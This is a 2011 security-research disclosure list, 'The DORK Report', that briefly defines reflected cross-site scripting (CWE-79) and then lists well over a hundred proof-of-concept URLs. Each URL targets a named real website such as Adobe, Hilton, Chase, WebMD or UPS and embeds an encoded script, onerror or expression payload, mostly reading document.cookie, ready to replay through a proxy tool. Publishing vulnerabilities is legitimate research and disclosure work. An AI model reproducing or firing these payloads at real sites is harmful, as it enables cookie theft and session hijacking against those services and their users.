The DORK Report for 2-28-2011

AUTHOR: Hoyt LLC Research

Keywords: Cross Site Scripting, XSS, SQL Injection, Proof of Concept, URI, Click to Execute, CWE-79, CAPEC-86, Unforgivable Vulnerabilities

Last Updated: March 6, 2011 1358 GMT

Description: Spreadsheet of Unforgivable Vulnerabilities in URI Format

HOW TO: Use a Proxy and Repeater tool such as ZAPROXY!

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CAPEC-86: Embedding Script (XSS) in HTTP Headers

Description Summary - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser.


.

https://www.adobe.com/cfusion/membership/index.cfm?nl=1&loc=en_us&nf=1772b5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed3ef7d7598a

.

http://pixel.yola.com/LoggingAgent/LoggingAgent?url=//antifung.yolasite.com/&pagename=index&siteid=8a4986cb2dc8c27e012dcd5a0c3a4596&resolution=1920x1200&colorDepth=16&flash=1&java=1&sitereferer=&visitorId=C4A762FB-9ED0-0001-2F15-1374B3C317AE&visitId=C4A762FB-9EE0-0001-23F0-168637A01F71&LoggingAgentReturnType=script

.

http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E80478cdc8ac/6

.

https://login.openx.org/sso/login?service=http://adserver.openx.org/e5ca3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb9deb20ab73

.

http://us.levi.com/home/index.jsp?41973--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E611476de3bd=1

.

https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/&7f449%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E015c86c2350=1

.

https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/b7ead%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee2d94503ef8

.

https://idcenter.services.optimum.net/Services/Process/ID/SignInByAccountNumber?referer=http://www.optimum.net/&nsextt=%22%3E%3Cscript%3Ealert(9)%3C/script%3E

.

http://iconfactory.com/favicon.ico76031%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3Eb9a88e5c578

.

https://www.networksolutions.com/manage-it/renewal-center.jsp?7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E6fa7b01d733=1

.

http://www1.hilton.com/en_US/hi/hotel/BOSFDHF-Hilton-Boston-Financial-District-Massachusetts8b619%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fb045a4243/index.do;jsessionid=0ABC42E492304CBBBCE5486E110ECEB6.etc32?brand_id=HI&brand_directory=/en/hi/&xch=826093977,Q3LJIA5WFPFVGCSGBI1MVCQ

.

http://www.hilton.com/en/hi/hotels/search/newresults.jhtml;jsessionid=Q3LJIA5WFPFVGCSGBI1MVCQ?statusMsg=status_success.jhtml&searchType=city&null=3&eventType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E&it=Find,city&_requestid=279855

.

https://secure.hilton.com/en/hi/res/choose_dates.jhtml;jsessionid=Q3LJIA5WFPFVGCSGBI1MVCQ?_requestid=285735&86abc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E125a40cedac=1

.

http://realestate.boston.com/includes/iframes/Central_Ad.aspx?location=Bostonf1d29';alert(document.cookie)//969191c726c&state=MA

.

http://calendar.boston.com/json?jsonsp=Zvents_load_ZventsWidget1d09a7%3Cscript%3Ealert(document.cookie)%3C/script%3E179eab94f48&limit=2&p=40&search=true&when=Today&sid=0

.

http://btn.weather.ca/weatherbuttons/template5.php?placeCode=USMA0046&category0=Cities&containerWidth=150&btnNo=&backgroundColor=blue&multipleCity=0&citySearch=0&celsiusF=F57b9a%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E338fbadd480

.

http://www.homeinsight.com/Widget/default.asp?JExnY2lBWzwuIDplY2ZyQmA3XSkrZDIyXDUrXi8wYicvWSovKltbYDMlYV00K2EvWmAuLzBkJEhmT2VtZFpjZDorH05mR25tZWlpWWM8LiBMb1RhcWJeZmA1KCVQa0hucmFtZ11mOCkdTT5MT2dxYWBlYTcrHkp0X0JeX2JdcDZDX28YS2dmbRlVY11pIG8aR2daYGkaRl9wY2NtHD1qZltocWNobHEeVWJgbmM1LTQtIEFjZ19mbTkwMCgdS2JbXVFtbXBcYTdPZ2cfTWxoYnNbY2scUWBaamhxX2wkQWRnXmpuT3FnZDo7YGNsbB5QZV5iXWslUV9mbmpZcl5FXjgt&a4aff%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E8ce6c4ac049=1

.

http://widget.relocationality.com/searchwidget.php?agent=6345ad44%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E8780582e90e

.

http://cache-www.pronto.com/combine.phpd6bdb'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9cb9ce2aee9?type=javascript&hash=19&files=

.

http://loadus.exelator.com/load/?j=w&p=102&c=20210&g=001&kw=&ctg=1b51f%3C/ScRiPt%20%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ec4a36802f95&subctg=All

.

http://oasn04.247realmedia.com/2/LiveNation140c5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6b55715eea5/ArtistAffinity/1832727109@x02?&prop3=LN_US:%20Home&prop16=LN_US:%20Home

.

http://snas.nbcuni.com/snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback60b4e%3Cscript%3Ealert(document.cookie)%3C/script%3E93142b60814

.

http://www.babypronto.com/?e65b5'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2d9936def6=1

.

http://my.nbc.com/app/socnet/accounts/register?mod=inline&siteName=nbc.com&refresh=true&redirectUrl=/accounts/link-your-profile&cssSkin=/app/socnet/css/fan-it-register.cssa29d9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2679af6670&hasStepTwo=false

.

http://html.aggregateknowledge.com/iframe?pid=32ca11c%3Cx%20style%3dx:expression(alert(1))%3Ebe32e7e9c3b&itemid=60458&senduuid=0&che=1297439075

.

http://www.u-tokyo.ac.jp/index_e.html?bd1cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4ef1fb46055=1

.

http://www.japan-guide.com/e/e2164.html?ab1d4%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a8465b9d46=1

.

http://widget.quantcast.com/wwp.greenwichmeantime.com36bcb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef55edf5835a/1

.

http://www.quantcast.com/learning-center/case-studies/study/auto3/?504f9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7707cd15c5e=1

.

http://wiki.answers.com/favicon.ico155eb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E94353820e1f

.

https://hubpages.com/signin/?s=high&url=/my/hubs/statsd5c59%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1de617bf248&explain=view%20your%20account%20settings.

.

http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22;alert(document.cookie)//5e820bfb5e

.

http://www.webmd.com/click?9f374"-alert(document.cookie)-"dd709cbc542=1

.

https://data.webmd.com/sdclive/sdcform.aspx?formid=l2uRegistration&566a4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee8792a84efa=1

.

http://exchanges.webmd.com/68316'-alert(document.cookie)-'5976a95f57f

.

http://forums.webmd.com/366cd4'-alert(document.cookie)-'0ac885bacdb/heart-disease-exchange/forum/NaN

.

http://www.emedicinehealth.com/script/main/hp.asp?78330%22-alert(document.cookie)-%2230a0e17e228=1

.

https://apply.chase.com/Auto/landingpage.aspx?offercode=f9b80%22style%3d%22x:expression(alert(1))%22d20292961db

.

http://www.chasemilitary.com/?7ca8c%22;alert(document.cookie)//4fee81aef6=1

.

http://bossip.com/?34e65%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E39a50604bc8=1

.

http://eventful.com/?45518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecc616a5fa67=1

.

http://splashpage.mtv.com/favicon.ico3ad54%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddbab9eb078

.

https://taxes.hrblock.com/hrblock/login/ForgotAccountInfo.hrbx?46f3a%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E34df3b750ec=1

.

http://delb.opt.fimserve.com/fimbid/?cachebuster=1297527968699QYf&cb=window[%22tHiHk%22]28e62%3Cscript%3Ealert(document.cookie)%3C/script%3E01727d17839&sz=728x90&api=2&enc=1.1&est=b2bad27c9be54ebae765562787c6e1c9&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=-279234638&pcat=2&ck=1&fl=1&d=http://www.tmz.com/signup/

.

http://www.dailymotion.com/us?36e95%22-alert(document.cookie)-%223d06c4e1df7=1

.

http://www.dailymotion.com/us?36e95%22-alert(String.fromCharCode(72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72,32,67,87,69,45,55,57,32,88,83,83,32,68,79,82,75))-%223d06c4e1df7=1

.

http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917

.

http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09

.

https://www.ups.com/one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%00'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.

http://www.webbyawards.com/webbys/current_honorees.php?media_id=96f9e24%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E346d75171f8&category_id=61&season=13

.

http://www.dianomioffers.co.uk/smartads.epl?id=752198f9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddb3314bdd4

.

http://www.wikia.com/index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E95be19a1de3&outputType=html

.

http://uk.reuters.com/assets/commentsChild?articleId=UKTRE71C1YB20110213fac44%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb818c7a361b&headline=''The+King's+Speech''+royal+winner+at+BAFTA+awards&channel=lifestyleMolt&edition=UK&view=base

.

http://oscar.wapolabs.com/RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578%3Cscript%3Ealert(String.fromCharCode(72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72,32,67,87,69,45,55,57,32,88,83,83,32,68,79,82,75,32,72,84,84,80,32,72,69,65,68,69,82,32,82,69,70,69,82,82,69,82))%3C/script%3Eead23a8fea2&format=json&url=http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display:none;&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=[CS]v1|26AC438B850103D6-4000010D4000193E[CE]&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=[CS]v1|26AC438B850103D6-4000010D4000193E[CE]&da.userAgent=Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+en-US)+AppleWebKit/534.13+(KHTML,+like+Gecko)+Chrome/9.0.597.98+Safari/534.13&da.userLanguage=en-US

.

http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69

.

http://blogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E045c9ac9fe9?ver=2.50

.

http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69

.

http://dev.inskinmedia.com/trackports/rep/base/track.php?callback=jsonp129764733685915067%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E559c6769366&type=init&section_id=124015&content_type=PAGE&page_url=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&failed=0&reason=&version=31

.

http://forums.webmd.com/favicon.icobbaec'-alert(document.cookie)-'6ed61bc743e

.

http://cache1.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6

.

http://cache.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6

.

http://www.hidglobal.com/onlineOrderStatusRegistration.php?a9f34'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E43e4407fe64=1

.

http://www.securitynewsdaily.com/tools347ac'-alert(document.cookie)-'9f9a2e36974/

.

https://www-secure.symantec.com/connect/symantec_symaccount88e60'-alert(document.cookie)-'72d4beaeb8b?profileURL=https://symaccount-profile.symantec.com/SSO/index.jsp%3FssoID%3D1297710255984zLG9Ht01OE8Lpk2m7u68K6G69r7hE3181J0hD

.

http://www.symantec.com/connect/sites1a6cc'-alert(document.cookie)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico

.

http://michellemalkin.com/?81050%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E870b0f9b5a6=1

.

http://www.wnd.com/?pageId=43b3c67--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebfaacc0cca3&authorId=108&tId=8

.

http://www.itar-tass.com/eng/level2.html?GroupID=146&155f5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8f5b16e7b11=1

.

http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844?1de37'-alert(document.cookie)-'c190883ce16=1

.

http://www.thedailybeast.com/favicon.ico914b4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E400d90bee91

.

http://www.autocheck.com/?WT.mc_id=3499&siteID=34993a90c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E71b1ae04cc8

.

http://www.davidcorn.com/?f30aa%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E20a47154da3=1

.

http://www.thedailybeast.com/author/lloyd-grove/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.

http://www.davidcorn.com/302b7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef7a89825d06

.

http://www.observer.com/author/rex-reed?4cffd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea708ae6face=1

.

http://www.stubhub.com/search/doSearch?searchStr=gipsy+kings&pageNumber=1&resultsPerPage=50&searchMode=event4343e%22;alert(document.cookie)//876e42bb3c8&start=0&rows=50&geo_exp=1&channel=

.

http://www.iso.org/iso/catalogue_detail.htm?c540a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecaf6dcdb360=1

.

http://schoonermaggieb.net/?bd52a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef777ff6092=1

.

https://sso.shld.net/shccas/shcLogin?sourceSiteId=null&service=f9a97%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee950194e815&gateway=true

.

http://www.stylemepretty.com/%7Chttp:/stylehive.com%7Chttp:/stylelist.com%7Chttp:/www.outblush.com/%7Chttp:/www.dooce.com/%7Chttp:/www.mightygoods.com/%7Chttp:/www.coolmompicks.com%7Conemanga.com%7Cpsychcentral.com%7Cwebmail.aol.com%7Chttp:ef655%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea44390d74f9/www.weblogsinc.com%7Chttp:/www.webmd.com/$%7Cwonderwall.msn.com%7Cmsn.com/wonderwall%7Cv14.msn.com/%7Cpreview.msn.com/%7Cwww.msn.com/preview.aspx%7Cmtv.com/videos/%7Cmtv.com/

.

http://new.evite.com/neo-services/analytics?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

.

http://v1.aberdeen.com/includes/asp/sponsored_registration.asp?ci=/launch/report/benchmark/6575-RA-content-aware-data-loss.asp&spid=30411935&camp=767d4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee91b1583aea

.

http://www.itbusinessedge.com/cm/community/news/sec/blog/microsoft-warns-of-windows-mhtml-xss-vulnerability/?cs=45331&60a70%22%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E2feb06588c5=1

.

https://buy.stubhub.com/checkout/checkout?logisticsMethod=2dbe9c';alert(document.cookie)//38fa58b682e&price=100.0&quantity_selected=2&ticket_id=281933854

.

http://www.wreg.com/tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false

.

http://wreg.vidcms.trb.com/alfresco/service/edgefa03a%3Cscript%3Ealert(document.cookie)%3C/script%3E54eb2fdb930/content/299fda98-b8af-49c4-987a-09d58e40d6e6

.

http://www.msg.com/js/msgcom51690%3Cscript%3Ealert(document.cookie)%3C/script%3Ed1a6cd6133f/omniture.js

.

http://alerts.4info.com/alert/listeners/getSportsListing.jsp;jsessionid=499F81F18F1B95FB02CAA5B3CF18DBA0?get=statsLeagues&callback=_4i.alerts[0].popLeagues58028%3Cscript%3Ealert(document.cookie)%3C/script%3E31acf6ed69b&output=json&seed=586772&rand=0.854787022806704

.

http://www.comcastoffers.com/?cid=524633e161--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2ae386e0a01&affid=422668326::b::internet%20service::dial%20up%20isp

.

http://virtacore.com/?66f9b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebbeb208fd95=1

.

http://www.thelist.com/?6fd89--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3e9f72d52de=1

.

http://member.internet.com/4ca4a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3bbcce52da1?v=df32f76fa6fa8754bd6541fbadfecfe211e5e258bcf020cb52e7a9e01ff3686a0edfe7667c06596631975dce2bb7dde8d8d152e9f519c68a2e56c43d18985ca6

.

http://isp.thelist.com/?4d0ed--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7894299f6b8=1

.

http://www.wi-fihotspotlist.com/?4100a--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1dd4930cfbd=1

.

http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1

.

http://www.thecounter.com/?6955f--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee525c47aab4=1

.

http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1

.

http://www.phpbuilder.com/?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1

.

http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1

.

http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1

.

http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780=1

.

http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?60daf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E16c9b78682c=1

.

http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1

.

http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1

.

http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y

.

http://aserve.directorym.com/ModuleG.aspx?dm_affiliate=448e5948';alert(String.fromCharCode(88,83,83))//81e894ba1c7&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url=

.

http://www.food.com/?8ce18%22-alert(document.cookie)-%2228d313d23df=1

.

http://blog.cookingchanneltv.com/2011/02/03/untrapped-the-anti-tourists-guide-to-venice-with-jamie-oliver3cbfd%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4a34c66f6ba/

.

http://my.foodnetwork.com/registration/register_lite.esi?DEST_URL=http://www.foodnetwork.com/app/food/mrb/myrecipes/index.do?applicationId=MY-RECIPE-BOX2cb53%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5036fd5a7a5

.

http://info.lycos.com/tos.php/ae929%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E70fe457df73

.

http://videos.howstuffworks.com/search.php?947f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8f546c63ec0=1

.

http://utm.alibaba.com/cm/hotproduct9d966%3Cscript%3Ealert(document.cookie)%3C/script%3E1edee7f7ef2/hotProducts.js?memberId=&cookieId=&tn=&encrypt=y&valueName=utmReturnValue_4&source=aisn&todaysNewHomeVersion=&date=Mon%20Feb%2021%202011%2007:43:07%20GMT-0600%20(Central%20Standard%20Time)&country=US

.

http://support.camerontec.com/index.php/css/blueprint/screen.cssa7a18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E977b917c429

.

http://www.4shared.com/signUpBox.jsp?df='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&login=3&months=1&password=3&password2=3&planSelect=1&resetDirView=3

.

http://www.wrh.noaa.gov/sew/main.php/ff97e%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E4bc70615a2f

.

https://www.demandstudios.com/application.html?role=Writerdbaf0';alert(document.cookie)//3aa185a0bce&utm_source=DemandMedia&utm_medium=site&utm_campaign=writer

.

http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E64ff6fcbc40

.

http://uid.shoplocal.com/uid.aspx?callback=json_results45a5f%3Cscript%3Ealert(document.cookie)%3C/script%3E72002c4d70c

.

https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=jdk-6u24-oth-JPR@CDS-CDS_Developer&6855a--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc4102ec8a7=1

.

https://client.trafficshaping.com/signin?email=1b192%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E32cca89645832eced&password=&action=login

.

http://login.howstuffworks.com/registration/how-stuff-works/register.html?site=DORA&a=register&c=HSW&oc=e8346%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed68588a82d6

.

http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155519e8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4642e4bf25f&cid=RSSfeed_IWK_News

.

http://www.itbusinessedge.com/cm/community/news/sec/blog/microsoft-warns-of-windows-mhtml-xss-vulnerability/?cs=45331&60a70%22%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E2feb06588c5=1

.

http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1c5367c1276627aae?action=docheck&urlo=http://cloudscan.us&submit=Check+PR

.

http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css

.

http://comments.csoonline.com/files/csocomments_favicon.ico?78001%22-alert(document.cookie)-%223356cf7e2ee=1

.

http://weekly-prizes.com/?aff=154ced24%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E1330ed82d58&subid=&pop=0&r=1&sound=1&sid=1001

.

http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=18ce37%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E810f4ffdf43&item=5

.

http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/

.

http://klout.com/?4facd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8ccd61759dc=1

.

http://rtb0.doubleverify.com/rtb.ashx/verifyc?ctx=741233&cmp=5027088&plc=56548503&sid=953349&num=1&ver=4&dv_url=http://www.komonews.com/&callback=__verify_callback_2587954816405975d%3Cscript%3Ealert(1)%3C/script%3E8e27cf83e0e

.

http://www.virtusa.com/applications/userlogin/userlogin.asp?fn=practicebrochure/DWBIPR-PB-0410.pdfc59a7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E562a4528863&iframe

.

https://sso.springsource.com/cas/login?38852--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef4d8a81df54=1

.

http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=1172a81%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E567e449ac8d&provider=765295

.

http://www.123count.com/37de3'-alert(document.cookie)-'9be839d0a09?webpass:1::::1920x1200::16::::::0.06353209936060011::http://web-pass.com/

.

http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E

.

http://directorym.com/?e0ec2%22-alert(document.cookie)-%2268a0f1fc021=1

.

http://dailycaller.com/?c20fc%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1676ef044e4=1

.

http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000905)%3C/script%3E

.

http://qap.questcdn.com/qap/action/IPPshowProjData?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F9)%3C/script%3E

.

https://pro.vembu.com/account.php?page=login&error=43104%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9ae1100b3a8

.

http://www.savvis.com/_layouts/SavvisUtilities/BreadCrumb.aspx?text=Solutions9897f%3Cscript%3Ealert(String.fromCharCode(88,83,83,32,72,79,89,84,32,76,76,67,32,82,69,83,69,65,82,67,72))%3C/script%3E29e80fc9d2a&url=http://www.savvis.com/en-US/Solutions/Pages/Home.aspx

.

http://www.schneider-electric.com/sites/corporate/en/products-services/electrical-distribution/electrical-distribution.page?f=F13:Electrical%20Distributiona88b2%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c5dd40e551

.

http://www.integratelecom.com/care/webmail.php/337f4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5ae1561966d

.

http://hosting.elihosting.net/OS4/index.php/Utilb48a6%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E60a918c2c13/Javascript?app=Login&ver=current&js=Login.js

.

http://ads.dotomi.com/ads.php?pid=12783&mtg=0&ms=18c388c';alert(document.cookie)//021f311ca71&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=360

.

